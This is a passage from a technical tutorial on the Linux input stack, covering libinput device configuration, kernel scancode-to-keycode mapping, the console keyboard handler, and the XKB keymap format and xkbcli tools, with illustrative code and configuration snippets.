		libinput_event_destroy(event);
	}

	libinput_unref(li);
	udev_unref(udev);
	return 0;
}
But what about configuring devices, setting up the things that we want
per device? Well, as we’ve said, this is done in the upper stack
since libinput has no configuration files, and we’ll cover this later. For
now let’s just list a few of the things that can actually be configured.
tap-to-click related, such as how many fingers are supported
three-finger drag
pointer acceleration profiles
scrolling method natural vs traditional
left-hand mode
middle button emulation
click method
disable while typing (DWT)
disable while trackpointing (DWTP)
direct-input device calibration
rotation confs (if touchpad is sideways)
area confs
You can get a glimpse of these on X11 with the command
xinput --list-props <device_id>
, or with
libinput list-devices
, which we’ve seen earlier and which
should show the configuration per-device:
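For a touchpad, the tail of an entry looks roughly like this (trimmed; values illustrative):
Tap-to-click:     disabled
Tap drag:         enabled
Left-handed:      disabled
Nat.scrolling:    disabled
Middle emulation: disabled
Calibration:      n/a
Scroll methods:   *two-finger edge
Click methods:    *button-areas clickfinger
Disable-w-typing: enabled
Accel profiles:   flat *adaptive
Rotation:         n/a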
That’s about it when it comes to libinput. Now we can move to more
specific things in the upper stack.
Keyboard Specifics
We’re pretty much done with the lower part of the user-space stack, but
before moving on to the graphical widget libraries and desktop environments,
let’s take some time to see some of the specific device handling that
is good to know about, namely keyboards, mice, and gamepads.
In this section we’ll see three important concepts related to keyboards:
scancodes to keycodes, console keyboard handling, and XKB.
Scancodes to Keycodes
Like other input drivers, the role of keyboard drivers is to translate
from raw hardware keys to events that can be normalized and interpreted by
user-space. We call the raw keys scancodes, and the normalized events keycodes
(
/usr/include/linux/input-event-codes.h
). Keycodes are also mapped
to key symbols in user-space unrelated to their actual keycodes, which we
call keysyms.
For example, a scancode can look like a random hex value
0x1E
, a kernel-mapped
keycode like
KEY_A
, and a keysym will look like a symbol such as “a” or “A”.
We’ll talk more about keysyms mapping when we see XKB. But let’s focus
on the scancodes to keycode translation for now.
When a keyboard input device registers itself in the input core
(
input_register_device
) it has to report which keycodes it supports
in its capabilities (
keybit
capability). In general it has to set its
keycode
,
keycodemax
, and
keycodesize
fields, which are a map of
the translation of scancodes to keycodes.
These keymaps can either be full-fledged dense keymaps or sparse keymaps,
the latter being smaller and using less memory. Sparse keymaps are
mostly used when registering only a few entries, such as special keys that
don’t need huge arrays.
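A hedged sketch of a driver using the sparse keymap helpers from include/linux/input/sparse-keymap.h (the scancodes here are made up):
#include <linux/input/sparse-keymap.h>

static const struct key_entry example_keymap[] = {
	{ KE_KEY, 0x01, { KEY_WLAN } },		/* vendor scancode 0x01 -> rfkill key */
	{ KE_KEY, 0x02, { KEY_BRIGHTNESSUP } },
	{ KE_IGNORE, 0x03 },			/* known scancode we don't care about */
	{ KE_END, 0 },
};

/* in the probe function, after allocating the input device: */
err = sparse_keymap_setup(input_dev, example_keymap, NULL);
if (err)
	return err;

/* later, when a raw vendor event arrives: */
sparse_keymap_report_event(input_dev, scancode, 1, true);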
If a scancode isn’t found in these translation arrays, it’s often
either completely ignored, or the driver reports it as an unknown key.
Keyboard input devices can also optionally implement two important
functions:
getkeycode
and
setkeycode
, which will by default retrieve
the current keymap and alter the current keymap respectively. Most drivers
fall back to the default mechanism, so this can be taken for granted.
Importantly, the
evdev
and
kbd
(console) handlers offer ways to call
these via ioctl interfaces, which will be propagated to the devices
they’re currently handling. For
evdev
it’s through
EVIOCGKEYCODE
and
EVIOCSKEYCODE
, to get and set keycodes respectively. For the console
handler it’s through
KDGETKEYCODE
and
KDSETKEYCODE
. The exception
is that the console driver will propagate it to all handlers, and thus
indirectly to all devices on the platform.
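A hedged user-space sketch of remapping through the evdev ioctl interface (the scancode is made up and error handling is omitted):
#include <linux/input.h>
#include <sys/ioctl.h>
#include <fcntl.h>
#include <unistd.h>

int main(void)
{
	int fd = open("/dev/input/event5", O_RDWR);	/* needs the right privileges */
	unsigned int map[2] = { 0x70039 /* scancode */, KEY_ESC /* new keycode */ };

	ioctl(fd, EVIOCSKEYCODE, map);	/* set the scancode -> keycode mapping */
	ioctl(fd, EVIOCGKEYCODE, map);	/* read it back: map[1] now holds KEY_ESC */
	close(fd);
	return 0;
}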
You can also do the runtime patching of scancode to keycode
mapping through udev and hwdb by setting a device property in
ENV{KEYBOARD_KEY_<hex scan code>}=<key code identifier>
which will in
turn be caught by
systemd/src/udev/udev-builtin-keyboard.c
and also
call the same ioctl interfaces.
For example:
ENV{KEYBOARD_KEY_b4}=dollar
To find out the actual scancodes the device is generating, the
showkey(1)
tool from the Linux Keyboard tools project, with the
--scancodes
flag,
will attach to the console handler and display them in raw mode. And the
setkeycodes(8)
command from the same project will propagate it to the
driver via the console input handler.
There are multiple other tools used to do the keycode remapping such
as
evmapd
,
evremap
,
evdevremapkeys
, but these work at the evdev
layer and don’t know about scancodes. So for now, the simplest one to
do scancode to keycode mapping is obviously the built-in one: hwdb.
This mechanism for runtime modifications might save us time instead of
getting our hands dirty and having to modify kernel drivers.
Console Keyboard
We’ve discussed the
evdev
handler extensively; however, in the console
it’s the
kbd
input event handler (
drivers/tty/vt/keyboard.c
) that is
used, and it’s working in sync with the tty and line discipline mechanism.
This particular handler exposes its devices as TTYs in the infamous
/dev/ttyN
and
/dev/console
(system) and handles all the messiness
of console text-mode input.
The input handlers coexist. When switching from a graphical environment
to the console, the VT
kbd
handler takes over.
Obviously, as a console input handler, the
kbd
handler has much more
work to do, and it has a lot of special handling via ioctl too: from
bell and tone, LEDs, setting the console key rate, modifiers, interpreting
special keys that have meanings for the TTY, switching to other modes
such as raw input mode or graphics (X11, Wayland session), to pushing
everything towards the line discipline, etc. It handles things that are often
handled in user-space (the key rate is handled in the graphical stack too,
as we’ll see). The reason is historical entangling: the console existed
before the graphical stack.
For instance,
showkey(1)
, which we’ve just seen, relies on changing the
mode of the terminal via ioctl
KDSKBMODE
to
K_RAW
.
There are a bunch of commands to interface with these ioctls, such as
kbdrate(8)
to set the keyboard rate,
kbdinfo(1)
to get more info
about the kbd driver, and
kbd_mode(1)
to get the current keyboard mode
(raw, xlate, etc..)
Furthermore, since it takes a bigger role in handling scancode to
keycode translation, it also somewhat does keycode interpretation via its internal
keymap. That means the
kbd
handler can be responsible for handling the
difference in regional keyboard layouts and special keys. This is
something which usually happens in XKB, in user-space, which we’ll see
in the next section.
Thus it has two sets of ioctls:
KDSETKEYCODE
and
KDGETKEYCODE
for
low-level scancodes to keycodes, and
KDGKBENT
and
KDSKBENT
for the
keycode to symbol/action mapping (internally also confusingly called
key_maps
, as you’ll see everyone uses the word “keymap”).
The format of the keymaps translating keycode to symbol (
keymaps(5)
)
is managed by the kernel for each console, but usually more
easily set with user-space tools also from the
Linux keyboard
tools
project. For example
loadkeys(1)
and
dumpkeys(1)
. These can rely on files in
/usr/share/kbd/keymaps/
for a predefined set of keymaps. Let’s also mention that the default
one is found in
/usr/src/linux/drivers/tty/vt/defkeymap.map
.
Before we end, let’s mention
systemd-localed.service(8)
and its
localectl(1)
command. It is used to set the keyboard map for
both the console and the graphical environment (XKB in X11 as we’ll see)
based on the current locale. For example, it sets the keymap,
font, and other settings of the console and X11 XKB to the values found in
/etc/vconsole.conf
(see
vconsole.conf(5)
) through its service called
systemd-vconsole-setup(8)
, which is also called when the console is
initialized with udev. It can also help in setting the same values in
both the console and graphical stack.
Here’s
vconsole.conf
:
KEYMAP=us
XKBLAYOUT=us
> localectl
System Locale: LANG=en_US.UTF-8
VC Keymap: us
X11 Layout: us
NB: Terminal emulators don’t rely on the console input handler at all;
they use pseudo-terminals (PTYs) instead. These don’t have a VGA console,
don’t plug into the kbd handler, have no screen, etc. They are fed entirely by
user-space programs.
Example:
Line discipline <-> TTY driver (PTY slave side) <-> user process
`-> PTY master side <-> xterm process
Now let’s see how the keycode to keysym is done in user-space in the
graphical stack with XKB.
XKB
XKB, or X keyboard, is a common library (xkbcommon, xkbregistry,
xkbcompose) with a set of tools, an X11 protocol extension (X
Keyboard Extension), and a database collection of descriptions
(xkeyboard-config). Its role is to handle the keycode to keysym
translation in user-space.
While the name includes “X”, the common library and database are not only
used by Xorg but by most software, including graphical widgets such as
GTK and Qt, and Wayland compositors. We won’t cover the older X protocol
extension here, yet the reason why there’s an “X” in the name is that
it started as an extension and then got separated into a common library.
The two things we’ll focus on are xkbcommon, the xkb core engine that
parses and executes XKB definitions, and xkeyboard-config, which
is a project compiling a database of keyboard info, layouts, variants,
symbols, and rules. They work together.
As a word of warning, XKB is one of the most complex pieces of software I’ve
encountered, and its documentation is fiercely lacking and dispersed. It
has its own language and compiler, and the format is extremely convoluted
and inconsistent, often mixing camel case and snake case for no apparent
reason.
Even in the XKB documentation we find such comments:
Todo
Explain how to configure XKB, with examples
Due to the complexity of the format, this document is still in
construction.
And internally Xorg devs called it
“X Kitten Butcher”
.
We’ll try to make it approachable, and break the bad
spell. However, if you ever want more info check
the official
format
.
In order to perform the translation from keycodes coming from event
handlers to actual symbols, XKB relies on something called an XKB keymap
(yes everything is called a keymap). This XKB keymap is a compilation
of different components coming from the xkeyboard-config database that
are chosen based on the abstract, and more coherent, concept of layout,
variants, models, and options the user picks:
“RMLVO”
.
After this is picked, the XKB client software just has to keep track of
what’s called a state, and then send it along with the received keycode
to receive back the keysym.
A very basic example looks like this:
// create a complete keymap from the xkeyboard-config db
struct xkb_keymap *keymap;
// .. and a state object to keep track of what special state we're in
// that could affect the keysym output
struct xkb_state *state;
…
state = xkb_state_new(keymap);
xkb_state_update_key(state, keycode, pressed ? XKB_KEY_DOWN : XKB_KEY_UP);
xkb_keysym_t sym = xkb_state_key_get_one_sym(state, keycode);
The XKB state object tracks what affects the output of keycode to keysym,
things like modifiers and groups. This example doesn’t mention the idea
of key composing, but we’ll come back to it.
This is important to understand, since you can either have XKB handle
what happens in a specific state when a key is pressed, or do it from
the client side. For example, a client can choose to catch all Ctrl keys
and interpret Ctrl+h as backspace, or leave it up to XKB with a custom
mechanism to know what Ctrl+h means, and the client will receive back
the keysym for backspace directly, with no special handling from its side.
Yet, the downside is that this key combination will apply to everyone
that relies on this XKB keymap.
Before moving forward, we need a little baggage of definitions and
understanding; otherwise nothing will make sense.
evdev keycodes: the events coming from evdev, the ones listed in
/usr/include/linux/input-event-codes.h
XKB keysyms: Actual symbols (or dead key), actions, and special keys
that XKB will return, they exist in
/usr/include/xkbcommon/xkbcommon-keysyms.h
Modifier Keys: Special keys that can affect other keys such as shift,
alt, ctrl, “win”, etc.. Modifiers are also keysyms.
Geometry: The physical layout of a keyboard, what it looks like and
where the keys are
Levels and Groups: A level is another state a key can be in when you
press a modifier. For example, it’s expected that pressing shift with
“a” will output “A”; upper-case “A” is level 2 of that key. A group
is similar, but it switches the whole keyboard to another key mapping,
as if you had switched variants.
As you can imagine, there’s a lot at play with levels, groups, modifiers,
and actions that can happen, and that’s apart from the basic idea of
keycodes to keysym.
Even when it comes to keysym, the translation isn’t straight away. XKB
relies on intermediary objects.
XKB keycodes are not straight up evdev keycodes, but
evdev keycodes + 8
. Why 8, someone might ask. Well, the only answer
is backward compatibility from before evdev was a thing, and it’s
still there.
Furthermore, XKB converts these keycodes into physical key position
values that are compatible with ISO/IEC 9995-1. So we move from evdev
keycodes, to XKB keycodes, to abstract physical positions on a keyboard
layout. This is what happens in the keycode component files under
/usr/share/xkeyboard-config-2/keycodes/
. Keycodes have this form within
<...>
tags. For example:
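A sketch of what such assignments look like (the exact values live in the
keycodes files of your install, e.g. keycodes/evdev; this is the digits row):

<AE01> = 10;
<AE02> = 11;
<AE03> = 12;
...
<AE12> = 21;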
Or basically the first row from ISO/IEC 9995-1 on a keyboard.
To make it easier for users to pick an XKB keymap, without
having to know much details, the idea of picking only RMLVO,
Rules-Model-Layout-Variant-Options, was invented. This is an abstraction
on top to pick the components that make up a keymap, and thus come up with
the right keyboard behavior expected by the user. This is managed by the
XKB registry, which graphical environments interact with, this is what
is shown to the user when they’re asked about picking their keyboard
layout, the list of possible layouts and variants on those layouts,
along with special options.
Model – the name of the model of your keyboard
Layout – the layout(s) you intend to use (usually refer to country code)
Variant – the variant(s) of the layout(s) you intend to use (minor
and national variants)
Options – extra XKB configuration options to customize the standard
layout. For example to change modifier keys.
To know what’s actually picked as the final keymap, what’s called KcCGST,
we can run
xkbcli
. For example, for a dvorak keyboard, or a normal
qwerty keyboard:
> xkbcli compile-keymap --kccgst \
      --layout us \
      --variant dvorak \
      --options terminate:ctrl_alt_bksp
xkb_keymap {
xkb_keycodes { include "evdev+aliases(qwerty)"};
xkb_types { include "complete"};
xkb_compat { include "complete"};
xkb_symbols { include "pc+us(dvorak)+inet(evdev)+terminate(ctrl_alt_bksp)"};
	xkb_geometry { include "pc(pc105)" };
};
> xkbcli compile-keymap --kccgst \
      --layout us \
      --variant qwerty \
      --options terminate:ctrl_alt_bksp
xkb_keymap {
xkb_keycodes { include "evdev+aliases(qwerty)"};
xkb_types { include "complete"};
xkb_compat { include "complete"};
xkb_symbols { include "pc+us(qwerty)+inet(evdev)+terminate(ctrl_alt_bksp)"};
	xkb_geometry { include "pc(pc105)" };
};
We’ll revisit the RMLVO, let’s just say it’s all about what the “rule”
part refers to: a lookup table with rules mapping the abstract names to
the components of the keymaps which are called KcCGST.
KcCGST, or the Keycodes, Compat, Geometry, Symbols, Types, are the
component parts of an XKB keymap. This is the actual functional XKB
configuration that is used behind the RMLVO easy facade. In general, XKB
considers it an implementation detail and pushes for users to favor
configuring XKB through RMLVO. Yet, it’s the core of XKB!
The resolution of the RMLVO creates a complete keymap, a self-contained
object with all the related KcCGST components assembled together. This
complete XKB keymap is what is used by the clients.
To get a quick glimpse at what a full resolved keymap looks like, try
this command:
> xkbcli compile-keymap --layout us --rules evdev
Or for a more compact one, look again at the command such as the one we
just did before:
> xkbcli compile-keymap --kccgst --layout us --options terminate:ctrl_alt_bksp
xkb_keymap {
xkb_keycodes { include "evdev+aliases(qwerty)"};
xkb_types { include "complete"};
xkb_compat { include "complete"};
xkb_symbols { include "pc+us+inet(evdev)+terminate(ctrl_alt_bksp)"};
	xkb_geometry { include "pc(pc105)" };
};
Let’s go over these components and explain them.
First off, the KcCGST configurations that come from the xkeyboard-config
project are often found in the following places, in reverse order of
precedence, with the components bundled underneath:
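Typically (taking libxkbcommon’s default search path as an assumption here,
which can vary per distribution): /usr/share/X11/xkb/ (or
/usr/share/xkeyboard-config-2/), /etc/xkb/, ~/.xkb/, and $XDG_CONFIG_HOME/xkb/,
each containing keycodes/, compat/, geometry/, symbols/, types/, and rules/
subdirectories.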
Most of the components serve a useful purpose. The exception is the
geometry, a complex file used to describe what a keyboard physically
looks like. It’s not used in the latest xkbcommon mechanism though,
so we’ll skip explaining it.
The XKB configuration format has a few value types: strings ("hello",
"%S/pc"), numbers (42, 134), key positions (<AE12>, <BKSP>), and keysyms
(percent, a, A).
It also has many special keywords and some structural formats. The main
structural format is called a component, basically the components of
the KcCGST. Each XKB conf file is an aggregation of multiple of these
components, and each one can be flagged as:
default: one of these per component file, the variant to be used when none is specified
partial: incomplete, meant to be used from another conf
hidden: only used internally within the file’s scope
And the symbols flags can be one or many of these:
alphanumeric_keys
modifier_keys
keypad_keys
function_keys
alternate_group
The symbols flags are mostly metadata and don’t affect the XKB processing.
They’re indicators of what the component configuration covers, and if
none are present it’s assumed it covers a complete keyboard.
Let’s start with the most important keywords, the ones used to import
and merge files together, we’ve seen the
include
. It works by finding
the file of the same component with the specified name, if it exists
in any of the valid conf paths (or if explicitly mentioned with string
substitution shorthands), and then look for the variants inside or the
default value if none are passed:
include "file(variant)"
.
The
include
will override any information that already exists:
that is if new values are undefined it will keep the old one, but new
defined values will always override old ones. To avoid this, the
augment
"file(variant)"
should be used instead, it will update the properties
that are undefined, but keep the defined ones (it’s the reverse). Another
option is the
replace "file(variant)"
which will, as the name implies,
completely replace the full properties, regardless if some elements are
defined or not.
This “merge resolution” mechanism also applies to values within the
component objects, which can be tagged with augment, override, or
replace, too.
As for files, a shorthand exists to have a single statement with multiple
includes concatenated. In this case the following merge mode prefixes
are used:
+ selects the override merge mode (default).
| selects the augment merge mode.
^ selects the replace merge mode.
So you can now understand why the following line we’ve seen works, and
how it creates an inheritance mechanism, plugging multiple files together:
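For instance, the xkb_symbols line from the dvorak keymap we compiled earlier:

xkb_symbols { include "pc+us(dvorak)+inet(evdev)+terminate(ctrl_alt_bksp)" };

Each + pulls in another symbols file (or variant) and overrides whatever
was defined before it.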
Let’s now explain what each component does, and wrap up with how the
rules mechanism of the RMLVO then resolves them into an XKB full keymap.
The keycodes file is the most obvious one and the first entry point
for XKB logic: it translates from XKB keycodes to the ISO/IEC 9995-1
physical positions. The syntax of the component looks something like this:
default xkb_keycodes "mykeycode" {
    // defining the range
    minimum = 8;
    maximum = 255;

    // mapping of keycodes to layout keys
    <TAB>  = 23;
    <AD01> = 24;
    <AD02> = 25;
    <AD03> = 26;
    <AD04> = 27;
    <AD05> = 28;
    <AD06> = 29;
    <BKSL> = 51;
    <RTRN> = 36;

    // making one physical key name equivalent to another
    alias <LatQ> = <AD01>;
    alias <LatW> = <AD02>;
    alias <LatE> = <AD03>;
    alias <LatR> = <AD04>;
    alias <LatT> = <AD05>;
    alias <LatY> = <AD06>;

    // these are for LEDs, not always used by clients
    indicator 1 = "Caps Lock";
    indicator 2 = "Num Lock";
    indicator 3 = "Scroll Lock";
};
The syntax is straightforward: it’s a series of assignments, with the
possibility of aliases, and of giving names to indicators, which map to
the keyboard LEDs tied to locking/latching modifiers. By convention it
explicitly names special keys and refers to other keys by their ISO
positions.
Here’s a standard keyboard with its key positions:
Let’s move to the types component. This is where the information about
levels, and how to switch between them is defined.
virtual_modifiers NumLock;

type "ONE_LEVEL" {
    modifiers = None;
    map[None] = Level1;
    level_name[Level1] = "Any";
};
type "TWO_LEVEL" {
    modifiers = Shift;
    map[Shift] = Level2;
    level_name[Level1] = "Base";
    level_name[Level2] = "Shift";
};
type "ALPHABETIC" {
    modifiers = Shift+Lock;
    map[Shift] = Level2;
    map[Lock] = Level2;
    level_name[Level1] = "Base";
    level_name[Level2] = "Caps";
};
// override ALPHABETIC: Shift will cancel capslock
override type "ALPHABETIC" {
    modifiers = Shift+Lock;
    map[Shift] = Level2;
    preserve[Lock] = Lock;
    level_name[Level1] = "Base";
    level_name[Level2] = "Caps";
};
// override ALPHABETIC: Shift will ignore capslock
override type "ALPHABETIC" {
    modifiers = Shift;
    map[Shift] = Level2;
    level_name[Level1] = "Base";
    level_name[Level2] = "Caps";
};
// CapsLock acts as Shift with locking, Shift does not cancel CapsLock.
type "ALPHABETIC" {
    modifiers = Shift+Lock;
    map[Shift] = Level2;
    map[Lock] = Level2;
    map[Shift+Lock] = Level2;
    level_name[Level1] = "Base";
    level_name[Level2] = "Caps";
};
The syntax here is more cumbersome. Firstly, there are some definition
lines. In each type entry of the form type "name" (which can be prepended
with merge syntax, like anything else in this format), we have to define
the modifiers that will be used, as such:
modifiers = Shift+Lock;
The + is just a separator here.
If the modifiers are not real modifiers but virtual ones, then those
virtual modifiers also need to be defined earlier in the scope:
virtual_modifiers NumLock;
After defining the modifiers used for that type, we have a series of
mappings defining which combination of them reaches which level. This
has to do with how XKB consumes modifiers as it processes types and
outputs keysyms, its internal list of effective modifiers. Simply said,
with preserve the state object doesn’t consume the listed modifier when
the keysym is sent back to the client (xkb_state_key_get_one_sym), so
the client can still inspect it for further special handling.
The logic within XKB clients looks something like this:
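A minimal sketch of that logic with libxkbcommon (assuming the keymap,
state, and keycode variables from the earlier snippet; the Ctrl shortcut
handling is only an illustration):

// Which modifier index corresponds to the real "Control" modifier
xkb_mod_index_t ctrl = xkb_keymap_mod_get_index(keymap, "Control");
xkb_keysym_t sym = xkb_state_key_get_one_sym(state, keycode);

// Is Ctrl active, and was it left un-consumed (e.g. via preserve)
// by the type that computed this key's level?
int active = xkb_state_mod_index_is_active(state, ctrl, XKB_STATE_MODS_EFFECTIVE);
int consumed = xkb_state_mod_index_is_consumed(state, keycode, ctrl);

if (active > 0 && !consumed) {
    // treat it as a Ctrl+<sym> shortcut on the client side
} else {
    // use the keysym as-is, Ctrl already participated in producing it
}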
That’s useful for layout where you have, let’s say Greek letters for
Level1 and Level2, and at Level3 and Level4 there are the usual Latin
letters. So you’d want to preserve
Ctrl
and
Shift
, so that the
application can catch
Ctrl+c
for example, which would be in Level3
(Latin lower-case).
I’ve added different versions of the
ALPHABETIC
type in the example,
and how the capslock and shift combinations can affect letters.
Later on we’ll see how we assign the levels logic to symbols and
compatibility logic, but let’s just say that XKB will categorize keys
with a heuristic and assign them to default types if no other types were
explicitly chosen. These are:
"ONE_LEVEL"
: When there are only one level change for the keysym
"TWO_LEVEL"
: When there are exacly two levels change for the keysym
"ALPHABETIC"
: When the keysym is alphabetic and has two levels
"KEYPAD"
: For keypad keys of any level (two usually)
"FOUR_LEVEL_ALPHABETIC"
,
"FOUR_LEVEL_SEMIALPHABETIC"
, 3 to 4 keysym
"FOUR_LEVEL"
: When nothing else matches
The next component is the XKB compatibility, which is used to translate
key combinations into action statements. Actions can also be attached
directly in the XKB symbols component for each key, however it’s done in
the compatibility layer because it has a mechanism for generic pattern
matching of keysym combinations, so we don’t have to repeat the same
things in different places.
The actions that can be done in the XKB compatibility are varied
from latching/unlatching/locking/unlocking modifiers, changing level,
switching group, etc.. Many of these actions, however, only make sense in
combination with the XKB symbols component, so keep that in mind for now.
A compatibility map looks something like:
default xkb_compatibility "basic" {
    virtual_modifiers NumLock, AltGr;
    ...
    interpret.repeat = False;
    setMods.clearLocks = True;
    ...
    interpret Shift_Lock + AnyOf(Shift+Lock) {
        action = LockMods(modifiers=Shift);
    };
    ...
    group 2 = AltGr;
    ...
    indicator.allowExplicit = False;
    ...
    indicator "Caps Lock" {
        whichModState = Locked;
        modifiers = Lock;
    };
    ...
};

default partial xkb_compatibility "pc" {
    // Sets the "Alt" virtual modifier.
    virtual_modifiers Alt;

    setMods.clearLocks = True;

    interpret Alt_L + Any {
        virtualModifier = Alt;
        action = SetMods(modifiers=modMapMods);
    };
    interpret Alt_R + Any {
        virtualModifier = Alt;
        action = SetMods(modifiers=modMapMods);
    };
};
This has many parts: the interpret sections that map keys to actions,
the virtual modifier definitions, indicators, repeat behavior of keys,
and more. The important one is the interpret section, which matches a
keysym along with a modifier predicate (AnyOfOrNone, AnyOf, Any, NoneOf,
AllOf, Exactly). The body of the interpret can also be made more specific
by setting values such as useModMapMods to match a certain level.
Default values for parameters can be set globally, such as
setMods.clearLocks, which affects how SetMods and the other modifier
actions behave. The list of possibilities and actions within the
compatibility component is too long to explain here; it is extensive
and can be found here.
Let’s move to the keysym or symbol component, which as you would
have guessed, finally maps physical keys in ISO location format to
symbols. These files are often named after countries or languages or
specific features,
us
,
jp
,
group
.
It first has a metadata name in the name[GroupX] = "Symbols Name"
property, which can also be used to find which groups the symbols belong
to. This is also where virtual modifiers are mapped to actual keys with
modifier_map VIRTUAL_MOD { Symbol1, Symbol2 }.
And obviously, that’s where the
key <VAL>
are mapped to list of groups
within
{}
, and levels within
[]
.
key <TLDE> { [ quoteleft, asciitilde ] };
This means that the physical key <TLDE> will output a left quote
(backtick) at level 1, and the tilde character at level 2.
Additionally, we can also specify within the curly brackets whether a
specific type should be used instead of the default matching one:
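A sketch of that (the type name here is just one of the predefined types
from the types component):

key <TLDE> { type = "TWO_LEVEL", [ quoteleft, asciitilde ] };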
Similarly, the actions can be assigned here instead of in the
compatibility component, and the groups can also be explicitly expressed with
the syntax:
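A hedged sketch of both, loosely modeled on what xkeyboard-config itself
does (the key choices are illustrative; LevelFive is a virtual modifier
defined elsewhere):

key <AD01> { symbols[Group1] = [ q, Q ], symbols[Group2] = [ a, A ] };
key <RCTL> {
    type[Group1] = "ONE_LEVEL",
    symbols[Group1] = [ ISO_Level5_Shift ],
    actions[Group1] = [ SetMods(modifiers=LevelFive) ]
};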
That all should cover the KcCGST component syntax. It’s very long already,
I know, yet it barely covers the basics. Let’s see a few examples to
grasp the concepts.
In symbols/group we have:
// The left Alt key (while pressed) chooses the next group.
partial modifier_keys
xkb_symbols "lswitch" {
    key <LALT> { [ Mode_switch, Multi_key ] };
};
And in compat/basic we have this interpret:
interpret Mode_switch {
    action = SetGroup(group=+1);
};
The Multi_key maps to a compose key in compat/ledcompose:
Here’s another example swapping the top row numbers on shift:
default partial alphanumeric_keys
xkb_symbols "basic" {
    include "us(basic)"
    name[Group1] = "Banana (US)";

    key <AE01> { [ exclam,      1 ] };
    key <AE02> { [ at,          2 ] };
    key <AE03> { [ numbersign,  3 ] };
    key <AE04> { [ dollar,      4 ] };
    key <AE05> { [ percent,     5 ] };
    key <AE06> { [ asciicircum, 6 ] };
    key <AE07> { [ ampersand,   7 ] };
    key <AE08> { [ asterisk,    8 ] };
    key <AE09> { [ parenleft,   9 ] };
    key <AE10> { [ parenright,  0 ] };
    key <AE11> { [ underscore,  minus ] };
    key <AE12> { [ plus,        equal ] };
};

// Same as banana but map the euro sign to the 5 key
partial alphanumeric_keys
xkb_symbols "orange" {
    include "banana(basic)"
    name[Group1] = "Banana (Eurosign on 5)";
    include "eurosign(5)"
};
Here’s a symbol component which replaces key “B” to have a third level
activated with the right alt to display a broccoli.
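A sketch of what that could look like (assuming the us layout as a base and
the stock level3(ralt_switch) include; the variant name is made up):

partial alphanumeric_keys
xkb_symbols "broccoli" {
    include "us(basic)"
    name[Group1] = "English (US, broccoli on B)";

    // Right Alt acts as the level-3 chooser
    include "level3(ralt_switch)"

    // level1: b, level2: B, level3: U+1F966 BROCCOLI
    key <AB05> { [ b, B, U1F966 ] };
};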
NB: XKB has keysyms that allow controlling the mouse pointer from the
keyboard; this can be useful if clients actually understand these keysyms
and act on them.
It’s fine and all but we need the RMLVO so that the users can actually
use the keymap properly without bothering with all that we’ve seen.
The rules are in the rules directory as simple files without extensions,
accompanied by two listing files for GUI selectors: *.lst and *.xml,
the latter following the xkb.dtd in the same directory. The listing
files simply list all the models, variants, layouts, and options
available, nothing more, and are used by the XKB registry library,
which is in turn used by GUI selectors.
The logic exists within the rules files, which have this sort of syntax:
! include %S/evdev
! option = symbols
custom:foo = +custom(bar)
custom:baz = +other(baz)
// One may use multiple MLVO components on the LHS
! layout option = symbols
be caps:digits_row = +capslock(digits_row)
fr caps:digits_row = +capslock(digits_row)
We won’t go into details, but basically it has lines starting with
!
that set certain MLVO values and then map them to KccgstValue specific
component values. There are also variable names that can be defined
as shorthand for multiple values with
$var = val1 val2
, and there
are string substitutions starting with
%
. More info can be found
here
.
So we’ve got the full scope now of RMLVO to KcCGST, the big picture!
We didn’t discuss another sub-feature of XKB called composing, or the
compose key processor. We didn’t mention it because the configuration
doesn’t come with the xkeyboard-config project. It’s loaded independently
by clients that want to perform composition.
For X11 the configuration is found under /usr/share/X11/locale/*/Compose
and compose.dir, and in the home directory in ~/.XCompose. The content
of this directory is mostly deprecated apart from the compose
definitions, which follow the XKB_COMPOSE_FORMAT_TEXT_V1 format (see
Compose(5)). It’s a simple format that looks like this:
As you can see, this involves the <Multi_key> keysym we talked about in
an earlier example; this is where it’s interpreted.
After editing any of these files, the syntax can be validated with
xkbcli compile-compose.
The way the file is used is that clients pass it to the XKB compose
parser to get an in-memory table of it. Then the client keeps the compose
state, just like the modifier state, and plugs it into the main
interaction with XKB we’ve seen earlier. Like this:
// 1. Load compose table (locale-dependent)
struct xkb_compose_table *table = xkb_compose_table_new_from_locale(
    ctx, getenv("LANG"), XKB_COMPOSE_COMPILE_NO_FLAGS);

// 2. Create a compose state
struct xkb_compose_state *compose_state = xkb_compose_state_new(
    table, XKB_COMPOSE_STATE_NO_FLAGS);

// 3. For each key press, feed the keysym into the compose engine:
xkb_keysym_t sym = xkb_state_key_get_one_sym(state, keycode);
xkb_compose_state_feed(compose_state, sym);

// 4. Check compose status
xkb_keysym_t composed_sym;
switch (xkb_compose_state_get_status(compose_state)) {
case XKB_COMPOSE_COMPOSED:
    composed_sym = xkb_compose_state_get_one_sym(compose_state);
    // Use composed_sym; DO NOT use 'sym'
    // char buf[64];
    // xkb_compose_state_get_utf8(compose_state, buf, sizeof(buf));
    // printf("→ composed result: %s\n", buf);
    break;
case XKB_COMPOSE_CANCELLED:
    // Typically fall back to original sym
    break;
case XKB_COMPOSE_COMPOSING:
    // Wait for next key
    break;
case XKB_COMPOSE_NOTHING:
    // No composition; use raw 'sym'
    break;
}
// otherwise
// xkb_state_key_get_utf8
So, making key composing work is entirely dependent on the client, be
it on X11 or Wayland. In general the widget/toolkit libraries, and Xlib,
do it out-of-the-box and/or easily for us.
Finally, let’s review how to interface with XKB from the command line.
There are a couple of X11 bound, and deprecated legacy, commands such as:
xmodmap
(pre-XKB even)
setxkbmap
xkbcomp
xev
xkbprint
xkbevd
They will not work on Wayland since they rely on the X11-specific XKB
protocol (the XKM binary format and others), but they are still good for
debugging certain behavior on X11, and for directly interfacing with X11
to configure XKB interpretation on the fly, since it’s the X server that
relies on the library and loads the appropriate configurations.
The main interaction these days should all pass through
xkbcli
and
its subcommands. It comes with a few handy man pages:
xkbcli
xkbcli-list
xkbcli-dump-keymap-x11
xkbcli-dump-keymap-wayland
xkbcli-interactive-x11
xkbcli-interactive-wayland
xkbcli-compile-compose
xkbcli-how-to-type
xkbcli-compile-keymap
xkbcli-interactive-evdev
> xkbcli how-to-type 'P'
keysym: P (0x0050)
KEYCODE KEY NAME LAYOUT LAYOUT NAME LEVEL# MODIFIERS
33 AD10 1 English (US) 2 [ Shift ]
33 AD10 1 English (US) 2 [ Lock ]
> xkbcli compile-keymap --kccgst --layout us --options terminate:ctrl_alt_bksp
xkb_keymap {
xkb_keycodes { include "evdev+aliases(qwerty)"};
xkb_types { include "complete"};
xkb_compat { include "complete"};
xkb_symbols { include "pc+us+inet(evdev)+terminate(ctrl_alt_bksp)"};
	xkb_geometry { include "pc(pc105)" };
};
To list all the possible RMLVO values from the registry:
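The list subcommand does that:

> xkbcli list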
